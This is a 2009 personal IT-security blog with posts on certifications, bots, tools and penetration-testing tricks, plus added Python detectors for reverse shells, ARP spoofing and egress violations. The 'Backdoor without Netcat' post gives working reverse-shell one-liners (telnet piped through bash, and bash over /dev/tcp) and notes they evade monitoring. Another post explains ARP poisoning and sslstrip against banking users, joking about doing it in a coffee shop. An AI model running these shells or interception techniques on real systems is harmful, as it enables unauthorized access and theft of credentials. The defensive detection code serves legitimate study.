So what's next on my list? Well, I have two that are in a toss-up. The first is Snort IDS and IPS Toolkit by Jay Beale. Though I have also been thinking about the O'Reilly book Beautiful Security.

Here is the remainder of my year's reading list:

Wireshark and Ethereal Network Protocol Analyzer Toolkit

Nessus Network Auditing

Metasploit Penetration Development Vulnerability Research

Shellcoders Handbook: Discovering Exploiting Security

Reversing: Secrets of Reverse Engineering


Rootkits: Subverting The Windows Kernel

Web Application Hackers Handbook: Discovering and Exploiting Security Flaws

Database Hackers Handbook: Defending Servers

This is in no specific order yet. On top of all of this I really need to knock out this GPEN certification and the CISSP by the end of the year. Following soon behind that is the renewal of the CCNA. I'm probably going to do the CCNA Security, surprise :). This will renew my CCNA and add the Security piece to the end.

As many of you know I have been working on an IT security degree as well. While I hate to quit things, I really have a hard time finding a school that can teach real security things that are helpful in the real world as well as relevant. I am looking at the University of Advancing Technology. I guess the security program there was started by the same guy that started the Defcon conferences. That has some merit to it. The class outline looks to be relevant. So I may attend there to finish my degree.

To be quite honest I stumbled over an old favorite in my browser the other day, the infamous lab of Scott Morris. At the end of his resume page there is a link to how he came to be where he is: Scott's Story. After reading that story, I felt like I can just keep on doing what I do, how I do it, and who needs school. If any of you reading this know me personally, that's not an unfamiliar statement. So maybe I won't go back. This is hard to tell at the moment. It would sure help me focus on getting my GPEN and CISSP out of the way rather than having to come home and do homework every night. Who knows. Time will tell.

So if any of you out there want to join in the reading list, leave a comment or email me.

Monday, April 20, 2009

Second Post Today...

I was just sitting catching up on some news while drinkin' my morning joe and I had to comment on this. The article from Wired magazine, "The Great Brazilian Sat-Hack Crackdown", just makes me laugh! I am not one to condone illegal activity. What's more, I am a licensed HAM radio user and I really believe in proper use of frequency. However, to call the people that use these sats for communication criminals is probably going too far. What is the real scary part of this story? In case you missed it, the Navy's Fleet Satellite Communications system, or FLTSATCOM, runs unencrypted!

Now before you say "They said drug lords use them to communicate and that makes it a crime", let's look at reality. What available medium is not used for crime these days? Internet, yes. Cell phones, yes. HAM radios, yes. So all of these things must be illegal too. C'mon!

Do I think there are ways that the "legit" users could do things a bit better to take advantage of free, or low cost communications? I do. However, in some circumstances you have to do what you can with what you got. In the mean time, when are governments going to start to realize that if you don't want people listening to your stuff, encrypt it! They can listen to our conversations that are in the open without any problems, why can't we listen to what they have to say over an open frequency?

Backdoor without Netcat

So you want to get a remote shell on that box but you either cannot install software for some reason or your rules of engagement state that this is out of scope. No problem! Here is a handy little trick using our built-in tools.

Start two netcat listeners on your Windows machine:

C:\> nc -l -p 80

C:\> nc -l -p 443

From your Linux box now run the following command which opens our backdoor:

telnet [Windows Box IP] 80 | /bin/bash | telnet [Windows Box IP] 443

The interesting thing here is that everything you type in the port 80 window shows its results in the port 443 window. You now have a remote shell to that Linux box. Probably the nicest thing about this one is that we are opening two outbound connections from our Linux box to the Internet, on port 80 and port 443. In most cases these ports are allowed out from the box. Unless there is an IDS/IPS in place, this should skirt right under the radar.

Now if you are on a Linux box with good 'ol /dev/tcp, here is another way to do this:

On your Windows box start a netcat listener:

C:\>nc -l -p 80

Then on your Linux box run the following:

/bin/bash -i > /dev/tcp/[Windows Box IP]/80 0<&1 2>&1


Let's break this down. The -i after bash tells it to run in interactive mode. We will then take our Standard Input from the bash shell (0) and redirect this (<) to a duplicated (&) Standard Output (1). The second part is taking our Standard Error (2) of our bash shell and redirecting (>) this into a duplicated (&) Standard Output (1).


OK so that's some kick butt command line kung fu-rey. This is just one of the really nice things about taking a class at SANS. Ed Skoudis and John Strand are very good instructors (I don't mean to leave out the others. I'm sure they are good as well, I just haven't had the pleasure of taking a class from them yet). These alternate techniques came out of a challenge session between a few of the SANS instructors. They basically challenged each other "What if you don't have netcat in your pen test". These are some of the answers that came out. We did a lot more than this. We saw how to do port scans with /dev/tcp, telnet and ftp! Yes ftp! All of this without installing software on the target box.

Personally I prefer not to install software if possible. I do think clients whom you will be pen testing would love to hear "we don't install malware or tools on your box unless completely necessary to gain access". I can just imagine them getting the warm fuzzies from this.

If you have any cool little tricks like this to share, please comment! If you like this command line stuff, you can also browse on over to the Commandline KungFu blog, where you will see these challenges that Ed Skoudis and others partake in. I have learned a bunch from this blog, not only for pen testing, but for making system administration easier too!
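The post notes that these shells skirt under the radar unless something is watching for them. Here is an added example, from the defender's side, of what watching for them on the host looks like (this is my own code, not from the post, from SANS or from the Command Line Kung Fu blog). On Linux every open descriptor of a process is a link under /proc/PID/fd, and a socket shows up as `socket:[inode]`. A normal interactive shell has its stdin/stdout/stderr on a tty or a pipe; a shell launched with `/dev/tcp` redirections has them on a socket, which is the signal checked below. The process table is a constructed sample; `scan_proc()` does the same check against the live /proc.

```python
import os
import re

# Process names that count as a shell for this check (assumption: adjust per distro)
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# readlink() of a socket fd under /proc looks like "socket:[48211]"
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def suspicious_shell(comm, fd_targets):
    """True if `comm` is a shell and any of fds 0-2 resolves to a socket.

    fd_targets maps fd number -> readlink() result, e.g. {0: "socket:[31337]"}.
    """
    if comm not in SHELLS:
        return False
    return any(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def read_process(pid):
    """Collect comm and the fd 0-2 link targets for a live pid (Linux /proc only)."""
    base = f"/proc/{pid}"
    with open(f"{base}/comm") as f:
        comm = f.read().strip()
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"{base}/fd/{fd}")
        except OSError:
            pass  # fd closed, or we lack permission to inspect this process
    return comm, targets


def scan_proc():
    """Return pids of shells whose stdin/stdout/stderr is a socket on this host."""
    if not os.path.isdir("/proc"):
        return []  # not a Linux-style procfs; nothing to scan
    hits = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            comm, targets = read_process(pid)
        except OSError:
            continue  # process exited, or not ours to read
        if suspicious_shell(comm, targets):
            hits.append(int(pid))
    return hits


# Constructed sample process table (pid -> (comm, fd links)) standing in for /proc.
SAMPLE_PROCS = {
    101: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),        # admin at a terminal
    202: ("bash", {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}),  # /dev/tcp style
    303: ("bash", {0: "pipe:[9001]", 1: "socket:[48212]", 2: "pipe:[9002]"}),    # output to a socket
    404: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "socket:[5555]"}),         # daemon, not a shell
}


def flag_sample():
    """Pids in SAMPLE_PROCS that the check would report."""
    return sorted(pid for pid, (comm, fds) in SAMPLE_PROCS.items() if suspicious_shell(comm, fds))


if __name__ == "__main__":
    print("sample hits:", flag_sample())   # [202, 303]
    print("live hits:", scan_proc())
```

One caveat the post's first variant illustrates: in the `telnet | /bin/bash | telnet` form the shell's descriptors are pipes and it is the two telnet processes that own the sockets, so this check alone misses it. Catching that form means looking at the process tree (a shell whose stdin pipe is written by a network client) rather than the shell's own fds, which is why this kind of rule is usually one of several in a host monitor rather than the only one.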

Friday, April 17, 2009

Man in the Middle

Remember the good old days when we would fire up Cain or dsniff and do a man in the middle attack? What was the big problem with this technique? If you said the invalid certificate, you would be right. For those of you not familiar with this, here is the quick and dirty.

ARP, being a trusting soul, will accept an update from anyone by default. With that in mind we set our computer to tell all of the other computers on the network that we are their default gateway. We do this via an ARP packet. We continue to send these packets out, making sure they don't forget that we are in fact their default gateway. Now all of their traffic comes through us. Since we know the real MAC address of the real gateway, we send those packets out as normal. Pretty cool. The user is none the wiser at this point.

Now, Joe User decides to head on over to his bank site which uses HTTPS encryption. When we intercept that packet we terminate that secure connection and establish a new connection from us to the bank. For that brief moment when Joe's packets come to us and we send them off, it is all unencrypted. Very cool. Problem! The certificate we send to Joe for the HTTPS session is signed by us because we do not have the private key of the bank site....yet :)) When Joe's PC sees this incorrect certificate, it throws a warning message saying DON'T GO ON OR YOU WILL BE pWNED! OK it really doesn't say that but you have all seen the warning before.

Most people will click right through that not caring one bit. For those of us that are a little more security conscious though, we stop and investigate. Our plan is now foiled. Game over :(.

Enter sslstrip. This nifty tool makes our game go on. What's interesting about sslstrip is that no certificate error is sent. It simply redirects you to an HTTP session, for which your browser has no HTTPS certificate to complain about. So no more warnings, we can just capture away. If you want to be a little more sly you could send a new favicon.ico on with the packets to Joe that is a picture of a little lock. Looks secure :) muhahah! Very cool tool. MITM is possible again. So I will leave you with a video from pauldotcom showing how this cool tool works. I'm off to $tarbucks to pwn some private information, I mean surf some websites :)

John Strand's Channel showing SSLStrip and more!
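The ARP part of the post describes the attacker repeatedly announcing the gateway's IP with their own MAC. The flip side is that this is noisy and easy to spot if you pin the gateway's real MAC and watch ARP replies. Here is an added detection example (mine, not from the post or from pauldotcom): it takes a stream of ARP reply observations as (time, sender IP, sender MAC) tuples, which is what you would pull out of `arpwatch`, `tcpdump -n arp` or a periodic `arp -a`, and raises an alert when the gateway IP is claimed by a MAC other than the pinned one, or when one MAC starts claiming more than one IP. The gateway binding and the replies below are constructed for the demo.

```python
from collections import defaultdict

# Known-good binding for the default gateway. Constructed for the demo; in practice
# take it from the router itself or a static ARP entry, never learn it from the wire.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"

# Constructed ARP reply observations: (time, sender IP, sender MAC)
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.1.1", "00:11:22:33:44:55"),   # the real gateway answering
    (1.5, "192.168.1.20", "aa:bb:cc:dd:ee:20"),  # an ordinary host
    (2.0, "192.168.1.1", "DE:AD:BE:EF:00:01"),   # another MAC claims the gateway IP
    (2.1, "192.168.1.20", "de:ad:be:ef:00:01"),  # the same MAC now also claims .20
    (2.2, "192.168.1.1", "de:ad:be:ef:00:01"),   # repeated, to keep caches poisoned
]


def detect_arp_spoofing(replies, gateway_ip, gateway_mac):
    """Return a list of alert strings for suspicious ARP replies.

    Signal 1: any reply claiming gateway_ip with a MAC other than the pinned one.
    Signal 2: a single MAC that starts claiming a second IP, which is what a host
    impersonating both the gateway and its victims looks like on the wire.
    """
    alerts = []
    gateway_mac = gateway_mac.lower()
    ips_by_mac = defaultdict(set)
    for ts, ip, mac in replies:
        mac = mac.lower()  # normalise case so DE:AD and de:ad are the same station
        if ip == gateway_ip and mac != gateway_mac:
            alerts.append(f"t={ts}: gateway {ip} claimed by {mac}, expected {gateway_mac}")
        known = ips_by_mac[mac]
        if known and ip not in known:
            alerts.append(f"t={ts}: {mac} now claims {sorted(known | {ip})}")
        known.add(ip)
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES, GATEWAY_IP, GATEWAY_MAC):
        print(line)
```

Signal 2 needs a whitelist in real networks: a router with several interface addresses, or a host running VRRP/HSRP, legitimately answers for more than one IP from one MAC. Signal 1 is the one to page on, since the gateway MAC should only change when you change the router. The same pinning idea is what static ARP entries and switch features such as Dynamic ARP Inspection enforce on the infrastructure side.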

Friday, April 3, 2009

A Kick butt tool

OK, so as you all might know I have been stumbling on new cool command line techniques on the Windows platform. It started with the SANS 560 class, but has run beyond that now. I am an avid follower of Ed Skoudis' Command Line KungFu blog as well. Ed, and others bring out a lot of cool ways to do things from the command line. It is very pen tester centric but I find that it comes in handy in other places as well.

To get more to the point, yesterday I had to pull a list of mailboxes of a certain size from a Microsoft Exchange server. Sure, I could have opened Exchange System Manager, but the command line junkie in me said "there has to be a better way". So I started doing a little bit of searching. Quickly I came across how to do this with PowerShell. I thought, man, if only I could use PowerShell to get this and other things done in a pure XP/2003 environment.

Guess what? Not only can you install PowerShell on XP, but I also found this kick butt addon that will probably make any Windows admin out there drool, especially if they are constantly having to pull reports from AD, Exchange and systems in general.

Scoot on over to PowerGUI.org. This handy tool gives you a nice little GUI to store and retrieve all of your precious PowerShell scripts. The IDE in it even does the recognition of keywords; sorry, not a programmer, so I don't remember what they call that. Basically if you start to type a word and it matches a known command it will give you the listed matches to autocomplete for you. All nice, right?

The next good thing is the PowerPacks! There are PowerPacks for all kinds of stuff, and growing. I found a PowerPack for Exchange 03. Found a PowerPack for AD that not only allows me to save off nice queries for reports but also lets me restore deleted items from AD! You read that right. Bring those users back with the same GUID and SID! This is freakin' awesome because you used to have to pay for that handy feature. There are PowerPacks for OCS, SQL, Citrix and more. It is a community based project so there is lots of collaboration and sharing going on. The thing not to forget is that it is all just an IDE for PowerShell scripting. Add your own, share what you have done, try the shared objects.

I thought all of the remote desktops apps I found the other week were kewl, but it turns out that outside of security land, this is the coolest app I have seen in some time that actually helps out on the job.

Wednesday, April 1, 2009

more on bots

Not sure what set me in bot mode this week, but I have been intrigued by them and started a deeper study. That, coupled with today supposedly being Conficker's day to check in to its C&C for updates, has probably helped keep it a topic on my mind as well.

So sure they work on IRC in a lot of cases. IRC is a pretty straight forward protocol that many of us are probably at least a little familiar with. What though are the reasons for bots, techniques of bots and how can we protect against them? I would go as far as recommending a three step process:

1. Egress filtering at your edge firewall. This is going to block any traffic that you do not trust. Most people block untrusted communication from the Internet in, but I'm talking from the LAN out! Depending on your firewall maker, you may only get a good port blocker, which should help in a lot of cases, but if you have a firewall that is doing deep packet inspection, you can get most of your problem traffic stopped before these bots can phone home.

2. Update your OS and applications! This may seem like a no-brainer, and you may say "I have automatic updates on". The problem is that many of these bots and other malware are turning that service off or tricking that process into thinking it's checking in, when it really isn't. Also notice that I said applications as well. As much as we all like to bash Microsoft for being insecure, a lot of new techniques are being used to take advantage of third-party applications as well, because these tend to be ignored or harder to update automatically.

3. Update your AntiVirus. This is twofold. A lot of people think they are fine with that Norton 2003, (mentioned for example purposes only), because they are getting their signature updates still. The problem with that is these malware are becoming polymorphic. These types of malware cannot be noticed with general signatures. They have to be caught by recognizing abnormal traffic. The newer AV engines are able to view this type of behavior through other signatures and IPS functionality. If you are not also updating your AV engine, you might as well not update your signatures either.

OK, that's probably going too far, but it is important. We also need to make sure we are getting updates. Check the definition file date from time to time to ensure it is up to date. I have my AV update a couple of times a day; in most cases I'm surprised to see a definition file that is more than 24 hours old.

If you have a corporate antivirus system, someone should be running reports on your clients, making sure they are checking in and getting the latest updates. The reason for all of this is, again, that these malware are turning off AV systems or hindering their ability to do updates.

All that done and you should be in a good position to fight off these types of attacks. This is not everything you need, but I find that these 3 steps will help most. Of course it doesn't hurt to have an IPS/IDS on the network as well; stopping these things before they get on your network to begin with is also a great step!
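Step 1 above, egress filtering, is the one most people have never written down as a policy, so here is an added example of what a default-deny outbound policy looks like when you evaluate it against real flows (my own code, not from the post or from any firewall vendor). The policy and the flow records are constructed: only web ports go straight to the Internet, DNS may only go to the internal resolver and SMTP only via the internal relay, which is exactly what makes a bot's IRC check-in, its own DNS lookups and a spam run stand out in the firewall's deny log.

```python
import ipaddress

# Constructed policy for a small office LAN: default deny outbound, plus an allow-list
# of (destination network, protocol, destination port).
LAN = ipaddress.ip_network("192.168.1.0/24")
EGRESS_ALLOW = [
    ("0.0.0.0/0", "tcp", 80),        # web
    ("0.0.0.0/0", "tcp", 443),       # web over TLS
    ("192.168.1.2/32", "udp", 53),   # DNS only to the internal resolver
    ("192.168.1.3/32", "tcp", 25),   # SMTP only via the internal mail relay
]

# Constructed outbound flow records: (src, dst, proto, dst_port). Addresses from the
# documentation ranges stand in for the Internet.
SAMPLE_FLOWS = [
    ("192.168.1.50", "203.0.113.10", "tcp", 443),    # normal browsing
    ("192.168.1.50", "192.168.1.2", "udp", 53),      # DNS to the internal resolver
    ("192.168.1.77", "198.51.100.9", "tcp", 6667),   # IRC straight to the Internet: bot C&C?
    ("192.168.1.77", "198.51.100.53", "udp", 53),    # DNS bypassing the resolver
    ("192.168.1.60", "203.0.113.5", "tcp", 25),      # direct SMTP from a workstation: spam?
    ("10.0.0.5", "203.0.113.5", "tcp", 6667),        # not from our LAN; not an egress question
]


def is_allowed(dst, proto, port, allow=EGRESS_ALLOW):
    """True if some allow-list entry covers this destination/protocol/port."""
    d = ipaddress.ip_address(dst)
    return any(
        d in ipaddress.ip_network(net) and proto == p and port == pt
        for net, p, pt in allow
    )


def denied_flows(flows, lan=LAN, allow=EGRESS_ALLOW):
    """Return the LAN-originated flows the egress policy would block (and log)."""
    out = []
    for src, dst, proto, port in flows:
        if ipaddress.ip_address(src) not in lan:
            continue  # only LAN-to-outside traffic is subject to the egress policy
        if not is_allowed(dst, proto, port, allow):
            out.append((src, dst, proto, port))
    return out


if __name__ == "__main__":
    for flow in denied_flows(SAMPLE_FLOWS):
        print("DENY", flow)
```

The deny list is where the value is: a workstation repeatedly hitting 6667 or sending mail directly is a machine to go look at, regardless of whether the AV on it is happy. The limitation is the one the post already points at: a bot that phones home over 443 passes a port-only policy, and catching that takes deep packet inspection or a proxy that sees the request itself.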

If you are interested in learning more about bots, I found the following links posted to an email list I am a part of. It is a series of presentations from the folks over at Watchguard. Watchguard is not my first choice of security appliance, but there are many that are worse. The information contained in this series is good for an introduction to bots from a high level. Enjoy, and of course if you have questions you can ask me directly. I am glad to help you formulate a plan to protect your network for free. Yes free! OK enough with the shameless plug :) I will probably be posting more as I dive deeper into the realm of bots and botnets. Keep your eyes out!

Watchguard Botnet Series:

Part 1

Part 2

Part 3

Botnet Source Code for Overachievers

Wednesday, March 25, 2009

psyb0t

Is it a robot from a sci-fi book or a character from Futurama? Nope, it's worse! This is an IRC bot that infects routers. You read it right. The idea is that people a. leave their routers on all of the time, even though they shut down their PCs, and b. most people don't keep an eye on their router cuz it should just run. It appears to be doing so by taking advantage of vulnerabilities in applications that run on the router, such as phpMyAdmin or MySQL for example. You can read more at the following two links (at the time of this writing I couldn't get to the first, which is the group noted for discovery; the second includes excerpts from members of that group):

Dronebl

irc-junkies

I can't say I'm surprised. I worked on a contract for a company, who shall remain nameless to protect the innocent, who was running FatPipe load balancers which were taken over by a bot, almost 2 years ago. We really didn't do analysis on it to know where it was going, but I know it was bot activity, as blocking normal IRC ports on the core router stopped the traffic. It's a great but fiendish idea. Make sure your passwords are not easy to guess and keep up on the software/firmware updates for your routers! There are some suggestions for lowering your probability of infection on the Dronebl site.

Monday, March 23, 2009

Symantec Underground Economy

Symantec has released their report on the activity going on in the computer underworld. It doesn't claim to have a profile on all cybercrime in the world, but it is a good sample of the things that are being seen, sold, bought etc. You can check it out here:

Symantec Underground Economy

You do not have to register to read it, just answer 2 simple questions. I'll probably post a blog tomorrow on what I find interesting in the document after I have some time to read it.

Tuesday, March 17, 2009

Social Engineering; The new thing?

Social engineering has received a lot of media in the recent past in regards to security. Just how new is this technique? I'm sure arguments could date this back to biblical times when Jacob obtained Esau's firstborn privileges by giving him stew or even back to the serpent duping Eve into not following God's commands.

What about examples in more recent times? Again, I'm sure there are plenty of examples, but I stumbled on this one. It is a document released under the freedom of information act, talking about how FBI agents can and should use social engineering in their investigations.

FBI Social Engineering Manual Revealed!

This document is from 1956. There is no ground breaking stuff here, but it is an interesting read to see that even the man is aware of how well this technique works.

Credit for discovery goes to Mr. Kevin Mitnick, surprise :)

Monday, March 16, 2009

Always seems to be the simple things...

I just wanted to post a thought I had from this morning. For the past 4 major security projects I had to do, it took longer than it should have. The reason? Simple, I always outthink the problem at hand. In all 4 cases the solution to getting into the box, or recovering the password, or testing for cross site scripting, or mapping the network has been so easy that I missed it. I'm throwing everything but the kitchen sink at this MS box this morning. Intense injection attempts and other remote exploits, and 20 seconds in Hydra got me administrator user access because the password was really just that weak.

It seems that I just want to apply all of the cool new techniques available, and the good old password guessing, reading documents received from a client, or simple trial and error produced the access needed. There was no need for rainbow table attacks or complex sploits to get what I needed. I just needed to start at the basics.

Don't forget the basics! As much as we would like to think "naaw, it can't be that simple", it turns out to be just that. Don't get me wrong, pwning a box with the latest greatest 0day is cool, but when you're doing this for a living and just need to get it done, don't leave out the simple stuff cuz it's not 733t!

Thursday, March 12, 2009

Remote Desktops

So this isn't really security related, but I want to keep up on this blog, so I figured I would put down some things I found today. I'm not sure how many of you use the Remote Desktops MMC snap-in to connect to multiple Windows boxes. I like the idea of having all of my connections in one place, but man do I hate that you cannot sort or group them in any way.

That said, I found some tools that add some nice features: RoyalTS (http://www.code4ward.net/main/) and Visionapp Remote Desktop 2009 (http://www.visionapp.com/). I haven't used either for very long, only today actually, but here are my findings so far.

I really like RoyalTS 6.1. It has a kick-butt feature of being able to pull up Computer Management, the Event Log and more from a right-click menu. You can also add your own custom WMIC commands to the toolset. The biggest problem with 6.1 is that it's $30! I'm having trouble justifying spending money on a tool like this. The free version is limited to only 10 connections, and with more than 100 servers to connect to, that's not very helpful.

Visionapp is very nice in the user interface arena. It is easy to group your connections into logical folders. RoyalTS does this too, but it is a little less pretty. One of the best features this one has over RoyalTS is that you can import systems via an AD query. This made it a cake walk to pull all of the needed systems into one place. Alas, no toolset.

It's quite odd that I have immediately set the bar at needing a WMIC toolset in such a tool, when only this morning I barely had a place to connect to multiple systems from :) More to come after a full evaluation. If any of you know of similar applications, especially free ones, let me know in a comment!

Curt

Wednesday, March 11, 2009

New Blog!

So this will be my attempt to share the things I am learning on this endless journey of IT security. I hope to post details of projects I'm doing, thoughts I'm having related to IT security, and any news or interesting articles I stumble upon. I hope to share at least one of these things daily.

Check back soon!